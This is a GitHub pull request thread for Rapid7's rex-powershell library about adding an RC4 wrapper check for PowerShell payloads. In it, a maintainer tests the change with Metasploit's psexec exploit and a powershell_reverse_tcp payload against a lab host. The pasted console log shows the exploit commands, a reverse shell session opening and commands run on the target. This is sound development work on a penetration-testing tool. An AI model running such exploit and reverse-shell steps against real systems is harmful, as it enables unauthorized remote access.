search

rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts
Other
53 stars 34 forks source link

Add check for rc4 wrapper and code to implement #30

Closed bwatters-r7 closed 3 years ago

bwatters-r7 commented 3 years ago

The original PR here: https://github.com/rapid7/rex-powershell/pull/23 was incorrect because my local git settings were wrong when I put it up. Rather than argue with git, here's a fixed version. You will need https://github.com/rapid7/metasploit-framework/pull/11257 @smcintyre-r7

Testing

smcintyre-r7 commented 3 years ago

You will need rapid7/metasploit-framework#11257

I'm not sure this is necessary. The lib/msf/util/exe.rb methods are not called and the Powershell::metod isn't referenced. I tested this with the latest code on master (commit dc8113fc43f79b113735799089302f98ff896f76) and everything appeared to be working correctly.

In fact it seemed to be working a little too well. I wasn't able to confirm:

set payload windows/powershell_reverse_tcp set powershell::exec_rc4 false run verify no errors for payload size (this will fail for other reasons right now, though)

It seemed to be working in my environment, albeit inconsistently. See the first attempt fails and the second works.

msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/powershell_reverse_tcp 
PAYLOAD => windows/powershell_reverse_tcp
msf6 exploit(windows/smb/psexec) > set Powershell::exec_rc4 false
Powershell::exec_rc4 => false
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[*] 192.168.159.129:445 - Selecting PowerShell target
[*] 192.168.159.129:445 - Executing the payload...
[*] Powershell session session 4 opened (192.168.159.128:4444 -> 192.168.159.129:49591) at 2021-04-23 10:47:55 -0400
[-] 192.168.159.129:445 - Exploit aborted due to failure: unknown: 192.168.159.129:445 - Unable to execute specified command: RubySMB::Error::CommunicationError
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[*] 192.168.159.129:445 - Selecting PowerShell target
[*] 192.168.159.129:445 - Executing the payload...
[+] 192.168.159.129:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 5 opened (192.168.159.128:4444 -> 192.168.159.129:49592) at 2021-04-23 10:48:02 -0400

Windows PowerShell running as user DESKTOP-R9TM84E$ on DESKTOP-R9TM84E
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\WINDOWS\system32>ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::41f8:356f:73d4:9415%12
   IPv4 Address. . . . . . . . . . . : 192.168.159.129
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.159.2

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . : home.lan
   Link-local IPv6 Address . . . . . : fe80::20ec:f081:de3:a0ab%16
   IPv4 Address. . . . . . . . . . . : 192.168.250.119
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.250.1

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
PS C:\WINDOWS\system32>